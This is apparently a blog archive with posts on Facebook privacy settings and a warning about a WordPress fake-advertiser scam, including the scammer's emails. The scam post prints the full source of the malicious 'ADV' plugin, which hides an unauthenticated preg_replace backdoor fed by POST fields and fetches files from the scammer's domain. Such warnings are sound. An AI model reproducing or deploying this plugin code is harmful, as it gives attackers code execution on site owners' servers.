Category Archives: Security

Facebook Privacy – Apps



The last time we wrote about Facebook privacy, we dealt with the setting which controls the information that your friends bring into apps that they use. You can read that post HERE. Today, we will write about editing the settings for the apps that you use.

Facebook can be a lot of fun, right? There are many apps and games plus you can link other social networking accounts, such as Twitter, to your Facebook account. However, each app uses your information in different ways. Some apps only use a little of it, others use a lot more. Here’s how you can limit every app so that it only uses the information that it requires in order to work.

Click on the little arrow to the right of the word ‘Home’ up on the top right of any Facebook page. Choose ‘Privacy Settings’. Then choose Apps, Games and websites. What we are looking for on the next page is ‘Apps you use’ and the ‘Edit settings’ button on the right.

Once you click that button, you’ll see something like this:

Menu for App Settings in Facebook
This is where you can edit each app that you use on Facebook

This is the menu for the Fotobounce application. I’ve written about Fotobounce before. With this application you can download complete photo albums on Facebook as well as many other sites. Here is the post on that. 

Fotobounce needs to access some of my information in order to work. You’ll see what it needs to access on the right side where you see the words ‘required’. However, at the bottom, you’ll see that Fotobounce wants to do two more things. It wants to access my Computers Made Simple Page and it wants to have the right to ‘Post to Facebook as me’. Hmmmm. I wonder why Fotobounce needs to do this? Since I don’t want this application to do either action, at least until I know why it needs to, I will click on the word ‘Remove’. I can still use the app but it won’t be able to Manage my Pages or Post to Facebook as me. Done!

On the top right of this menu  you will see the words “Remove app’. If you have any doubt about an application that you use, clicking these words gets rid of that application for good. Give it a try. Do you really need all of those applications accessing your personal information? Think about it.

Facebook can be a lot of fun. We all know that. But Facebook also likes to use your information for their own gain and for reasons that have nothing to do with your enjoyment of the site. Facebook also won’t tell you what information it’s using. Setting your privacy limitations is vitally important. Get to know these settings and use them often.

Thanks for reading!



Facebook Privacy



The most important Facebook privacy setting is in the ‘Apps, games and websites’ section of your settings menu. Click on Home and choose Privacy Settings. From there, choose Apps and Websites: Edit Settings.

In this section, you can delete Apps that you don’t use any more, which is a great idea, but what you are interested in is the second section: How people bring your info to apps they use. Click on the Edit settings button. Once you’re there, you will see this:

Facebook Apps Settings
Make sure that nothing here is checked.

To me, everything on this menu is private. Some of these things I don’t even share with my friends. Why would I want to let Facebook spread this information around websites that my friends visit? Why are my religious and political views even part of Facebook? If you don’t uncheck everything here, Facebook has the right to tell complete strangers everything about you. Don’t let them!

By the way, the words at the bottom of this menu are completely false. They read: : “If you don’t want apps and websites to access other categories of information (like your friend list, gender or info you’ve made public), you can turn off all Platform apps. But remember, you will not be able to use any games or apps yourself.

This has nothing to do with this particular menu. Allowing an application to access your information is up to you. You choose the app, you say yes or no to letting the app use your information. Same goes with a website. That is separate from this particular menu.

This menu has to do with letting apps that your friends use access your information. It’s a blanket YES to whatever apps and websites your friends use. Make sure that everything here is not checked. Then click Save Changes.

TIP: As I surf the ‘net, I see many Facebook graphics with little pictures of Facebook users on them. If you click on a user, you will be taken to their profile page on Facebook. This is whatI mean:

A Typical Facebook 'Like" graphic
Do you want your photo in graphics like this?

This is the same as trolling, in my opinion. You have no idea who is clicking on your picture and accessing your profile and reading whatever information is there. My profile is very basic, no personal information at all. Someone can send me a message, no problem. Someone can add me, no problem. Unless they do, they won’t be able to know anything about me. But, they also won’t be seeing my pic on a Facebook graphic. Why? Because I have unchecked everything in the menu above. There is a class action suit about this use of user photos in California, as a matter of fact.

I will be writing more about Facebook privacy in the next few posts. Stay tuned and stay private.

Thanks for reading!



Facebook – How to be a Facebook Maven



Facebook privacy settings change almost as often as the weather these days. As Facebook tries to become more ‘Twitter-ish’, your privacy often gets lost in translation. Gone are the days of a simple public and private profile. These days you can think you are private but you’re often very, very public. Here’s how to deal with Facebook and its rapidly deteriorating concern for your privacy.

The first simple step is to set up at least one other Facebook profile. I have four, in case you’re wondering. Three are legitimate, more or less, while the fourth is just for fun. What is the use of having more than one Facebook profile? Well, depending on whether you are friends with yourself or not, you can try different privacy settings to see what’s private, what friends of friends can see and, most importantly, what’s open to the public.

By keeping at least one profile unfriended by all of the other profiles, you’ll be able to see the effect of the changes you make. If one of your friends (really yourself) is a friend of one of your other profiles, you can check on what Facebook keeps private and what it spreads around to friends of friends.

With this simple trick, you’ll be able to become a privacy maven (expert) on Facebook. The side benefit of this is that you’ll have lots more friends to play games with and share extra servings of whatever you’re cooking!

Over the next few days I’ll be writing more about Facebook and how to tune the privacy settings to match your personality. If you’ve got something to hide, this is where to read about how to keep it hidden.

Thanks for reading!



WordPress Scam


There is a WordPress advertising scam going around now. Here are the details of it. If you own a WordPress site, this is important reading. Please try to follow the whole post to the end.

1. The first contact is through a comment on your site. This is the comment, details may change somewhat:

“Hi,
Sorry I write you via comments. But I could not find contact e-mail or feedback form on your site.
We are looking for new advertisement platforms and we are interested in your site http://www.kitchenrenovation411.com.
Is it possible to place banner on your site on a fee basis?
Please, contact us at e-mail.
Best regards,
Mathis Gaillard.
site: http://www.izidaagency.com
e-mail: mgaillard @izidaagency.com
phone: + (0)9 78 62 91 00


2. Once you email the person, this is the reply:

> From: mgaillard@izidaagency.com
> To: my email
> Subject: Re: re: kitchenrenovation411.com
> Date: Thu, 10 Nov 2011 02:39:40 -0800
>
> Hello,
>
> Thanks for reply to our proposal!
>
> I represent Izida Agency. At the moment we are preparing an advertising campaign for Lacoste Company (it is a French company producing clothes, footwear, perfumery etc.) We already have designed banners for the campaign, they are the following sizes: 160×600, 240×400, 300×250, 336×280, 468×60, 728×90.
> What can be your price for one banner (banner should appear at ALL pages of your site) of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? Please mention a normal link for banner, without javascript code and set prices in US dollars per month.
> Here you can see our banners: http://docs.izidaagency.com/lacoste/?view=1
>
> Best regards,
> Mathis Gaillard.
> site: www.izidaagency.com
> e-mail: mgaillard@izidaagency.com
> phone: + (0)9 78 62 91 00

3. After some questioning on my part, I received this email:

Hi!
Before placing banner, your site need to be approved by the advertiser.
If you agree with it we'll send you special plugin, that
lets advertiser check your site and decide if it fits his requirements.

Best regards, 
Mathis Gaillard.
site: www.izidaagency.com
e-mail: mgaillard@izidaagency.com
phone: + (0)9 78 62 91 00
4. Finally, I get this email, complete with a password:

Hi!

 

Thanks for reply to our proposal!

We like your price.

To pass to the banner control system follow the link http://webmaster.izidaagency.com

To enter use the following data:

 

login: my other site

password: email me for password

 

You should install and activate the plugin in order to display advertisement.

Before making payment, advertiser must approve location of the banner.

The banner will be shown on your site when you add special code to your web- address

(for example: http://www.my other site.com/?adv_test=1).

It means, that visitors will see the banner only if it is approved and payment made.

To get installation instruction for your site type pass to: http://docs.izidaagency.com/wp_install

To activate your site you have to enter the code: GQP-HFA-55H

 

What way of payment is suitable for you?

 

Best regards,

Mathis Gaillard.

site: www.izidaagency.com

e-mail: mgaillard@izidaagency.com

phone: + (0)9 78 62 91 00

5. OK, now I have the code. What do I do with it? The file that I downloaded is a php script that I am supposed to upload to my WordPress site. Here is the actual code that was sent:

_____________________________________________________________________________________________

<?php

/*
  Plugin Name: ADV
  Description: ADV Plugin
  Version: 2.6.1
 */

class AdvWidget extends WP_Widget {

    function AdvWidget() {
        parent::WP_Widget(false, $name = 'AdvWidget');
    }

    /** @see WP_Widget::widget */
    function widget($args, $instance) {
        if (get_option('adv_place') == 'widget')
            advShowBanner();
    }

    /** @see WP_Widget::update */
    function update($new_instance, $old_instance) {
        $instance = $old_instance;
        $instance['title'] = strip_tags($new_instance['title']);
        return $instance;
    }

    function form($instance) {

    }

}

add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));

add_action('admin_menu', 'advPluginMenu');

register_activation_hook(__FILE__, 'advActivation');

define('ADV_SERVICE_DOMAIN', 'izidaagency.com');
define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key');

function advReadUrl($url) {
    if (function_exists('curl_init')) {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}

function advActivation() {
    update_option('adv_place', 'widget');
}

register_deactivation_hook(__FILE__, 'advDeactivation');

function advDeactivation() {
    delete_option('adv_key');
}

function advPluginMenu() {
    add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
}

function adv_show_banner() {
    advShowBanner();
}

function advShowBanner() {
    $advBanner = get_option('adv_banner');
    $advMode = get_option('adv_mode');
    if ($advBanner) {
        if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
            echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
        }
    }
}

function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST']));
    if (strpos($data, '<key>true</key>') !== FALSE) {
        preg_match("#<width>(.+?)</width>#", $data, $arr);
        update_option('adv_width', $arr[1]);
        preg_match("#<height>(.+?)</height>#", $data, $arr);
        update_option('adv_height', $arr[1]);
        echo '<div id="message"><p>The code is activated successfully.</p></div>';
        update_option('adv_key', $_REQUEST['key']);
        downloadBanners();
    } else {
        echo '<div id="message"><p>Code activation error.</p></div>';
    }
}

function downloadBanners() {
    $bannersDir = ABSPATH . "/adv_banners";
    if (!is_dir($bannersDir)) {
        mkdir($bannersDir);
    }
    $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
    preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
    preg_match("|<adv>(.+?)</adv>|", $list, $adv);
    preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
    preg_match("|<mode>(.+?)</mode>|", $list, $mode);
    if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
        update_option("adv_banner", $showBanner[1]);
        update_option('adv_mode', $mode[1]);
        foreach ($banners[1] as $banner) {
            $advBannerDir = $bannersDir . "/" . $adv[1];
            if (!is_dir($advBannerDir))
                mkdir($advBannerDir);
            $arr = explode("/", $banner);
            if (count($arr) == 2) {
                $size = $arr[0];
                $bfile = $arr[1];
                if (!is_dir($advBannerDir . "/" . $size))
                    mkdir($advBannerDir . "/" . $size);
                file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
            }
        }
        echo '<div id="message"><p>Banners are downloaded successfully.</p></div>';
    }
}

if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');

function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
    if ($action == 'downloadBanners') {
        downloadBanners();
    } elseif ($action == 'setPlace') {
        update_option('adv_place', $_REQUEST['adv_place']);
    } elseif ($action == 'saveKey') {
        activateCode();
    }

    $advPlace = get_option('adv_place');
    echo '<div>';

    echo '<h2>ADV</h2>';
    echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
    echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
    echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
    echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
    echo '</select>';
    echo '<input type="submit" value="Save"/></form>';
    echo '<div>';
    if (get_option('adv_key') === FALSE) {
        echo '<h2>Activation Code</h2>';
        echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
        echo '<input type="text" name="key"/>';
        echo '<input type="submit" value="Activate"/>';
        echo '</form>';
    } else {
        $mode = get_option('adv_mode');
        echo '<br/>Code: ' . get_option('adv_key');
        echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
        echo 'Mode: ' . $mode;
        if ($mode != 'work') {
            $url = get_option('siteurl') . "/?adv_test=1";
            $link = "<a href='$url'>$url</a>";
            echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment.
To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
        }
    }
    echo '</div>';
    echo '</div>';}?>

_____________________________________________________________________________

This isn’t a new scam. It’s been around for a few months or longer. Here is a link to another page which explains the same thing but from a different contact person:

http://keepsafeonthenet.co.uk/2011/07/martin-dumont/comment-page-1/#comment-87860

 

My comments are at the bottom of that page.

I have my feelers out now to see what this script does. There is a chance that it’s a trojan of some kind and it may not even be active after it’s installed. I can only assume that it will, at a future date, provide access to a WordPress site. If anyone can decipher the script, please do so and contact me using the comment section below.

I should say that the site this comment was on is a new site, very small with very little traffic. I have tried to contact Izod Lacoste but, so far, they have not emailed me back. If you have been affected by this scam, please comment below. The more we know about this, the safer the WordPress community will be.

Thanks for reading!


WordPress Comment Scam

Update: This scammer is using different names. The names used that I know of are: Rayan Meyer, Killian Blanchard, Mathis Gaillard, among many others. Please read this post to understand the modus operandi and then go to the site mentioned below for even more details. Good luck!
Scams are everywhere, it seems. Yesterday I received a comment on one of my other websites. The commenter asked if I was interested in placing a banner ad (from a major company) on the site. The person apologized for making a comment instead of emailing. I realized that I didn’t have an email address on the site and this made his comment sound legitimate.


Now my site isn’t as popular as this one. It’s about kitchens, kitchenrenovation411.com , and probably isn’t a site that an advertiser would pick for a banner ad. This should have twigged me that this was a scam. However, the company that this person was supposedly going to link to the banner is a very reputable company. Maybe the clientèle from my site fit the demographics they were looking for. Hey, it’s money, right?

I emailed the person and quoted a figure then did some heavy research. It seems that this kind of thing has been going on for quite a while. Here is a site that describes the dilemma that many WordPress bloggers find themselves in and the tricks scammers use to gain access to websites: http://keepsafeonthenet.co.uk/2011/07/martin-dumont/comment-page-1/#comment-87842 .

Here are some tips to avoid losing your website to a scammer:

1. If it sounds too good to be true, it almost certainly is. Whenever money is involved, our eyes light up  and we start planning for the future. That’s human nature. Most WordPress sites don’t make any money at all. If someone contacts you about a site that isn’t very popular, you know it is a scam.

2. Do your research. Search Google using the complete email or comment on your blog. This will almost certainly lead to a forum or another site that the scammer has contacted. Read what has been posted and confirm that your contact is fake.

3. Advertisers don’t send their advertising code in a zip file. If you get a zip file from someone who has contacted you through your website, you know it’s got a trojan in it. The contact that I am writing about insists that they will not use any java code, simply a link to the website of the advertiser. Baloney! There will be a zip file coming, I can guarantee it.

4. Brand name companies don’t work through small advertising companies. The website of the person who contacted me looks very professional but it hasn’t been updated since 2007. The website is also exactly the same as another company listed in the link above. Both sites are identical, the only difference is the person who is sending out the emails.

5. If you’ve been taken in by this kind of scam, you should consider your website to be compromised. Links will likely take users to other sites or, worse, your site may be used to email spam. Work with your hosting company to rid your site of the malware on it.

Hopefully this post will help you avoid this type of unusual scam. This kind of thing is criminal activity and should be considered as a threat to your site as well as to your hosting company. Once this kind of thing is on a server, there are many ways for it to spread. Hopefully your host can stay on top of it.

Thanks for reading.